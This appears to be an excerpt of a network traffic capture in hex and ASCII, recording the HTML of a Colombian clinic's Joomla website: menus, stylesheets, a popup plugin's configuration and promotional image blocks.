                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1270INData Raw: 37 63 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7cb1<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1270INData Raw: 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2d 63 6f 6d 70 69 6c 65 64 2f 6e 75 63 6c 65 75 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65
                                                                                                                                                                                                                                                                        Data Ascii: d_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nucleus/css-compiled/nucleus.css" rel="stylesheet" /><link href="/template
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1272INData Raw: 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 6a 73 2f 72 6f 6b 62 6f 78 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e
                                                                                                                                                                                                                                                                        Data Ascii: ootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/rokbox/assets/js/rokbox.js"></script><script src="/media/jui/js/bootstrap.
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1273INData Raw: 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 67 61 6e 74 72 79
                                                                                                                                                                                                                                                                        Data Ascii: es/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link rel="shortcut icon" href="/images/favicon.png"></head><body class="gantry
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1274INData Raw: 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 30 34 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                        Data Ascii: e-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-menu-item-type-separator g-menu-item-104 g-parent g-standard "><div
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1276INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"> <span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1277INData Raw: 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d
                                                                                                                                                                                                                                                                        Data Ascii: /ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-item
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1278INData Raw: 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: enu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1280INData Raw: 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: tem-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1281INData Raw: 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c
                                                                                                                                                                                                                                                                        Data Ascii: " href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></li><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1282INData Raw: 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65
                                                                                                                                                                                                                                                                        Data Ascii: nu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-me
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1284INData Raw: 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                        Data Ascii: ="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-menu-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1285INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67
                                                                                                                                                                                                                                                                        Data Ascii: "g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1288INData Raw: 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f 75 6e
                                                                                                                                                                                                                                                                        Data Ascii: le>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup backgroun
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1289INData Raw: 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79 62 6f
                                                                                                                                                                                                                                                                        Data Ascii: e', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancybo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1290INData Raw: 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67
                                                                                                                                                                                                                                                                        Data Ascii: oxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><img
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1293INData Raw: 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: <div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1298INData Raw: 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61
                                                                                                                                                                                                                                                                        Data Ascii: slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1301INData Raw: 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                        Data Ascii: istas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class=
